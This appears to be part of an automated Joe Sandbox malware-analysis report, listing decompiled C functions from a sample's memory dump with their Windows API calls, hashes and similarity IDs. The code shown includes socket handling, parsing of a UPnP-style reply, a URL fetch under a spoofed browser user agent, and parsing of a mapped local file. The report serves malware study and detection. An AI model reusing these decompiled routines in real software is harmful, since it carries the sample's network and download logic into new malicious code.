                                                                                                                                                                                                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                                                                                                                                                                                                  							return E0040DF40(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                                                                                                                                                                                                  							_push(_t106);
                                                                                                                                                                                                                                                                  							return E0040E2E0(_t108);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t73 = _t64 - 1;
                                                                                                                                                                                                                                                                  					if(_t73 != 0) {
                                                                                                                                                                                                                                                                  						L14:
                                                                                                                                                                                                                                                                  						return _t73;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                                                                                                                                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                                                                                                                                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                  							_v8 = _t106 + 8;
                                                                                                                                                                                                                                                                  							_v4 = __ebx;
                                                                                                                                                                                                                                                                  							E0040DF40(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                  							_t73 = E0040E4F0(_t106);
                                                                                                                                                                                                                                                                  							if(_t73 != 0) {
                                                                                                                                                                                                                                                                  								goto L14;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                  								return _t73;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}
















                                                                                                                                                                                                                                                                  0x0040e56a
                                                                                                                                                                                                                                                                  0x0040e56c
                                                                                                                                                                                                                                                                  0x0040e56e
                                                                                                                                                                                                                                                                  0x0040e6f6
                                                                                                                                                                                                                                                                  0x0040e70d
                                                                                                                                                                                                                                                                  0x0040e712
                                                                                                                                                                                                                                                                  0x0040e720
                                                                                                                                                                                                                                                                  0x0040e727
                                                                                                                                                                                                                                                                  0x0040e72c
                                                                                                                                                                                                                                                                  0x0040e739
                                                                                                                                                                                                                                                                  0x0040e73f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e73f
                                                                                                                                                                                                                                                                  0x0040e586
                                                                                                                                                                                                                                                                  0x0040e58f
                                                                                                                                                                                                                                                                  0x0040e592
                                                                                                                                                                                                                                                                  0x0040e655
                                                                                                                                                                                                                                                                  0x0040e667
                                                                                                                                                                                                                                                                  0x0040e670
                                                                                                                                                                                                                                                                  0x0040e68b
                                                                                                                                                                                                                                                                  0x0040e6a3
                                                                                                                                                                                                                                                                  0x0040e6ad
                                                                                                                                                                                                                                                                  0x0040e6b4
                                                                                                                                                                                                                                                                  0x0040e6b8
                                                                                                                                                                                                                                                                  0x0040e6c2
                                                                                                                                                                                                                                                                  0x0040e6d1
                                                                                                                                                                                                                                                                  0x0040e6e0
                                                                                                                                                                                                                                                                  0x0040e6f1
                                                                                                                                                                                                                                                                  0x0040e672
                                                                                                                                                                                                                                                                  0x0040e672
                                                                                                                                                                                                                                                                  0x0040e675
                                                                                                                                                                                                                                                                  0x0040e678
                                                                                                                                                                                                                                                                  0x0040e686
                                                                                                                                                                                                                                                                  0x0040e686
                                                                                                                                                                                                                                                                  0x0040e657
                                                                                                                                                                                                                                                                  0x0040e666
                                                                                                                                                                                                                                                                  0x0040e666
                                                                                                                                                                                                                                                                  0x0040e598
                                                                                                                                                                                                                                                                  0x0040e598
                                                                                                                                                                                                                                                                  0x0040e59b
                                                                                                                                                                                                                                                                  0x0040e74e
                                                                                                                                                                                                                                                                  0x0040e74e
                                                                                                                                                                                                                                                                  0x0040e5a1
                                                                                                                                                                                                                                                                  0x0040e5a7
                                                                                                                                                                                                                                                                  0x0040e5c3
                                                                                                                                                                                                                                                                  0x0040e5d4
                                                                                                                                                                                                                                                                  0x0040e5ec
                                                                                                                                                                                                                                                                  0x0040e5f6
                                                                                                                                                                                                                                                                  0x0040e600
                                                                                                                                                                                                                                                                  0x0040e604
                                                                                                                                                                                                                                                                  0x0040e608
                                                                                                                                                                                                                                                                  0x0040e61a
                                                                                                                                                                                                                                                                  0x0040e626
                                                                                                                                                                                                                                                                  0x0040e62a
                                                                                                                                                                                                                                                                  0x0040e634
                                                                                                                                                                                                                                                                  0x0040e63b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e641
                                                                                                                                                                                                                                                                  0x0040e641
                                                                                                                                                                                                                                                                  0x0040e64d
                                                                                                                                                                                                                                                                  0x0040e64d
                                                                                                                                                                                                                                                                  0x0040e5a9
                                                                                                                                                                                                                                                                  0x0040e5bb
                                                                                                                                                                                                                                                                  0x0040e5bb
                                                                                                                                                                                                                                                                  0x0040e5a7
                                                                                                                                                                                                                                                                  0x0040e59b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040E586
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E5B0
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E5C3
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040E5D4
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E65B
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E6F6
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32 ref: 0040E72C
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 0040E739
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: NtQuerySystemTime.NTDLL ref: 0040BB8A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: RtlTimeToSecondsSince1980.NTDLL ref: 0040BB98
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 671207744-0
                                                                                                                                                                                                                                                                  • Opcode ID: b79768d1b72cec46eaa8f69dca462b5c27b05df81c06aaaae392fe69171f8df6
                                                                                                                                                                                                                                                                  • Instruction ID: 51cd7334bbd969a96dec868ba5125ba97ee3022df73e2af357cdf7292c47256f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b79768d1b72cec46eaa8f69dca462b5c27b05df81c06aaaae392fe69171f8df6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0151CD75608702ABC714DF39D888B97F7E0BFC8314F408A3EE48993351D735A5198B96
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040C1B0(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                  				char _v1028;
                                                                                                                                                                                                                                                                  				char _v1029;
                                                                                                                                                                                                                                                                  				intOrPtr _v1036;
                                                                                                                                                                                                                                                                  				char* _v1040;
                                                                                                                                                                                                                                                                  				char* _v1044;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                                                                                                                                  				void* _t37;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t20 = __eax;
                                                                                                                                                                                                                                                                  				_v1029 = 0;
                                                                                                                                                                                                                                                                  				_v1036 = 0;
                                                                                                                                                                                                                                                                  				while(_v1036 < 2) {
                                                                                                                                                                                                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_t20 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_v1029 = 1;
                                                                                                                                                                                                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                                                                                                                                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                                                                                                                                                                                                  							if(_v1040 != 0) {
                                                                                                                                                                                                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                                                                                                                                                                                                  								_t29 = E0040AFB0(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                                                                                                                                                                                                  								_t37 = _t37 + 8;
                                                                                                                                                                                                                                                                  								 *_a8 = _t29;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t20 = _v1036 + 1;
                                                                                                                                                                                                                                                                  					_v1036 = _t20;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v1029;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x0040c1b0
                                                                                                                                                                                                                                                                  0x0040c1b9
                                                                                                                                                                                                                                                                  0x0040c1c0
                                                                                                                                                                                                                                                                  0x0040c1db
                                                                                                                                                                                                                                                                  0x0040c1fe
                                                                                                                                                                                                                                                                  0x0040c207
                                                                                                                                                                                                                                                                  0x0040c216
                                                                                                                                                                                                                                                                  0x0040c233
                                                                                                                                                                                                                                                                  0x0040c247
                                                                                                                                                                                                                                                                  0x0040c254
                                                                                                                                                                                                                                                                  0x0040c25f
                                                                                                                                                                                                                                                                  0x0040c282
                                                                                                                                                                                                                                                                  0x0040c287
                                                                                                                                                                                                                                                                  0x0040c28d
                                                                                                                                                                                                                                                                  0x0040c28d
                                                                                                                                                                                                                                                                  0x0040c254
                                                                                                                                                                                                                                                                  0x0040c209
                                                                                                                                                                                                                                                                  0x0040c20e
                                                                                                                                                                                                                                                                  0x0040c20e
                                                                                                                                                                                                                                                                  0x0040c1d2
                                                                                                                                                                                                                                                                  0x0040c1d5
                                                                                                                                                                                                                                                                  0x0040c1d5
                                                                                                                                                                                                                                                                  0x0040c29d

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C1FE
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040C20E
                                                                                                                                                                                                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C22B
                                                                                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C241
                                                                                                                                                                                                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C26E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                                  • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                                  • Opcode ID: 766efd74480ade401ae97df32cec916cef99da7e067a91872a851bbd2d4f1667
                                                                                                                                                                                                                                                                  • Instruction ID: 19bae495d964df930a5416a6b101112f45a73436487c04b08a4f8f7f296c2ab0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 766efd74480ade401ae97df32cec916cef99da7e067a91872a851bbd2d4f1667
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 382165B0940218DBDB30DF64DD85BA97774AB04308F1086F9E709BA5C1C6B859CA8F5C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040D160(char* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				char _v9;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v9 = 0;
                                                                                                                                                                                                                                                                  				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                                                                                                                                                  					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						_v24 = 4;
                                                                                                                                                                                                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                                                                                                                                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                                                                                                                                                                                                  							 *_a8 = _v20;
                                                                                                                                                                                                                                                                  							_v9 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				return _v9;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x0040d166
                                                                                                                                                                                                                                                                  0x0040d17d
                                                                                                                                                                                                                                                                  0x0040d184
                                                                                                                                                                                                                                                                  0x0040d19c
                                                                                                                                                                                                                                                                  0x0040d1a3
                                                                                                                                                                                                                                                                  0x0040d1a5
                                                                                                                                                                                                                                                                  0x0040d1bf
                                                                                                                                                                                                                                                                  0x0040d1cc
                                                                                                                                                                                                                                                                  0x0040d1de
                                                                                                                                                                                                                                                                  0x0040d1e0
                                                                                                                                                                                                                                                                  0x0040d1e0
                                                                                                                                                                                                                                                                  0x0040d1e8
                                                                                                                                                                                                                                                                  0x0040d1e8
                                                                                                                                                                                                                                                                  0x0040d1f2
                                                                                                                                                                                                                                                                  0x0040d1f2
                                                                                                                                                                                                                                                                  0x0040d1fd
                                                                                                                                                                                                                                                                  0x0040d209

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D177
                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D196
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D1BF
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D1E8
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D1F2
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D1FD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36, xrefs: 0040D172
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  • API String ID: 2743515581-922322672
                                                                                                                                                                                                                                                                  • Opcode ID: 9580dc84764a9631a1c584e1580e1d15ff9d3e5fb4ab9709a14850b64044bd1a
                                                                                                                                                                                                                                                                  • Instruction ID: 6415d18d8a99034fddaf571bd804c2e16c3977809638760880a7fb89b11d9709
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9580dc84764a9631a1c584e1580e1d15ff9d3e5fb4ab9709a14850b64044bd1a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7821FC74E40209EBDB20DF94CD49F9EB775AB48705F208475FA11BB2C0CBB56A48CB55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404320() {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				long _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				void* _t35;
                                                                                                                                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                                                                                                                                  				void* _t66;
                                                                                                                                                                                                                                                                  				void* _t67;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				InitializeCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				_t35 = CreateFileW(0x413180, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  				_v8 = _t35;
                                                                                                                                                                                                                                                                  				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v12 == 0) {
                                                                                                                                                                                                                                                                  						L14:
                                                                                                                                                                                                                                                                  						return CloseHandle(_v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v16 == 0) {
                                                                                                                                                                                                                                                                  						L13:
                                                                                                                                                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                  					_v24 = _v16;
                                                                                                                                                                                                                                                                  					while(_v20 != 0) {
                                                                                                                                                                                                                                                                  						if(_v20 >= 0x100) {
                                                                                                                                                                                                                                                                  							_t45 = E0040AF30(_v24, _v24);
                                                                                                                                                                                                                                                                  							_t67 = _t66 + 4;
                                                                                                                                                                                                                                                                  							_v28 = _t45;
                                                                                                                                                                                                                                                                  							if(_v28 != 0) {
                                                                                                                                                                                                                                                                  								_v20 = _v20 - 0x100;
                                                                                                                                                                                                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                                                                                                                                                                                                  									E00404210(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                                                                                                                                                                                                  									_t66 = _t67 + 0x10;
                                                                                                                                                                                                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								E00408990(_v28);
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					UnmapViewOfFile(_v16);
                                                                                                                                                                                                                                                                  					goto L13;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t35;
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x0040432b
                                                                                                                                                                                                                                                                  0x00404345
                                                                                                                                                                                                                                                                  0x0040434b
                                                                                                                                                                                                                                                                  0x00404352
                                                                                                                                                                                                                                                                  0x0040436c
                                                                                                                                                                                                                                                                  0x00404373
                                                                                                                                                                                                                                                                  0x0040443b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040443f
                                                                                                                                                                                                                                                                  0x0040438b
                                                                                                                                                                                                                                                                  0x00404392
                                                                                                                                                                                                                                                                  0x00404431
                                                                                                                                                                                                                                                                  0x00404435
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404435
                                                                                                                                                                                                                                                                  0x004043a4
                                                                                                                                                                                                                                                                  0x004043aa
                                                                                                                                                                                                                                                                  0x004043ad
                                                                                                                                                                                                                                                                  0x004043ba
                                                                                                                                                                                                                                                                  0x004043c2
                                                                                                                                                                                                                                                                  0x004043c7
                                                                                                                                                                                                                                                                  0x004043ca
                                                                                                                                                                                                                                                                  0x004043d1
                                                                                                                                                                                                                                                                  0x004043de
                                                                                                                                                                                                                                                                  0x004043ea
                                                                                                                                                                                                                                                                  0x00404411
                                                                                                                                                                                                                                                                  0x00404416
                                                                                                                                                                                                                                                                  0x00404422
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404422
                                                                                                                                                                                                                                                                  0x004043f0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043f5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043d3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043bc
                                                                                                                                                                                                                                                                  0x0040442b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040442b
                                                                                                                                                                                                                                                                  0x00404448

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00412F50,?,?,?,?,?,00406247), ref: 0040432B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00413180,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00406247), ref: 00404345
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404366
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404385
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040439E
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040442B
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404435
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040443F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3956458805-0
                                                                                                                                                                                                                                                                  • Opcode ID: afe1eb869866639b1fe7b092215121f765bbc30eff8fe0f728147ad0b59ede4b
                                                                                                                                                                                                                                                                  • Instruction ID: 8cf7ad255a7857f357f70f31b3d1861fd7fd2a42964d5e35bc13e120cdf15e34
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afe1eb869866639b1fe7b092215121f765bbc30eff8fe0f728147ad0b59ede4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C83130B4E40209EFDB10DFE4DD4ABAEB770AB88711F208579E6017B6C0D7B46941CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                                                                                                  			E0040C600(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				WCHAR* _v12;
                                                                                                                                                                                                                                                                  				WCHAR* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				WCHAR* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				WCHAR* _v32;
                                                                                                                                                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                                                                                                                                                  				void* _t99;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_push( &_v8);
                                                                                                                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v20);
                                                                                                                                                                                                                                                                  						_push(_v16);
                                                                                                                                                                                                                                                                  						_push(_a4);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                  							L21:
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
